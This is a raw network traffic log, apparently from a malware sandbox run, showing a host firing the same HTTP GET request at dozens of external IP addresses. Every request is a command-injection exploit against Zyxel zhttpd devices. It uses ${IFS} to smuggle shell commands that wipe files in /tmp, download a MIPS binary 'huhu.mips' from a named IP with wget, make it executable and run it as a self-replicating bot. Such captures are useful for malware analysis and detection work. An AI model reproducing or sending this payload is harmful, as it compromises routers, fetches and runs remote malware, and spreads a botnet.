                                                      Feb 2, 2024 06:35:41.375448942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1459192.168.2.145272866.192.241.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375490904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1460192.168.2.1437308117.150.4.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375529051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1461192.168.2.145838019.92.208.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375565052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1462192.168.2.1457468152.216.130.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375618935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1463192.168.2.143306646.117.108.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375650883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1464192.168.2.143971662.108.217.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375696898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1465192.168.2.143600220.231.173.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375754118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1466192.168.2.1443776173.137.42.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375782967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1467192.168.2.1451252170.58.4.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375855923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1468192.168.2.143324434.170.247.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375884056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1469192.168.2.1436630153.243.96.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375916958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1470192.168.2.144331877.149.195.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375993967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1471192.168.2.1453936163.199.158.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376024961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1472192.168.2.144836063.235.110.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376055002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1473192.168.2.143859267.4.105.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376100063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1474192.168.2.1444590210.1.20.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376162052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1475192.168.2.1459712192.65.128.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376172066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1476192.168.2.143567438.220.190.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376210928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1477192.168.2.145470653.87.11.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376243114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1478192.168.2.143422020.148.28.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376298904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1479192.168.2.14450802.110.255.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376348019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1480192.168.2.143589432.157.32.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376365900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1481192.168.2.1436090156.69.169.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376442909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1482192.168.2.1455012116.74.211.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376442909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1483192.168.2.143651873.196.236.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376482964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1484192.168.2.14603165.39.163.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376537085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1485192.168.2.144181274.254.207.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376580000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1486192.168.2.1436696110.142.83.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376611948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1487192.168.2.14534828.243.192.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376650095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1488192.168.2.1457736152.118.161.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376677036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1489192.168.2.1436426166.105.172.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376737118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1490192.168.2.143723485.77.64.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376774073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1491192.168.2.1449544121.206.83.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376800060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1492192.168.2.143561812.112.57.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376846075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1493192.168.2.145236225.48.80.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376890898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1494192.168.2.1433418103.80.203.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376914978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1495192.168.2.143453297.85.62.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.376965046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1496192.168.2.144634882.210.161.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377008915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1497192.168.2.1445166111.117.199.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377027035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1498192.168.2.145212664.235.207.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377053976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1499192.168.2.1439404176.158.9.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377106905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1500192.168.2.1434404161.2.163.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377140045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1501192.168.2.1455186174.33.39.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377194881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1502192.168.2.145968850.229.119.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377228022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1503192.168.2.145304042.162.111.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377286911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1504192.168.2.145001487.186.85.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377317905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1505192.168.2.1438680142.125.103.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377365112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1506192.168.2.1442836137.121.167.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377388000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1507192.168.2.144837412.102.224.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377455950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1508192.168.2.1457956140.10.206.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377477884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1509192.168.2.1445846211.144.157.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377540112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1510192.168.2.143569893.181.131.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377568960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1511192.168.2.1444096135.62.220.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377609968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1512192.168.2.1449042209.77.171.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377651930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1513192.168.2.1452156209.224.152.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377682924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1514192.168.2.1449034117.218.63.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377722025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1515192.168.2.143700886.47.129.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377774954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1516192.168.2.144755688.201.2.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377818108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1517192.168.2.1438160170.182.86.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377873898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1518192.168.2.1450352135.238.245.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377917051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1519192.168.2.1446680125.137.137.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377940893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1520192.168.2.1441284195.44.148.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.377979994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1521192.168.2.144384463.219.253.21443
                                                      TimestampBytes transferredDirectionData
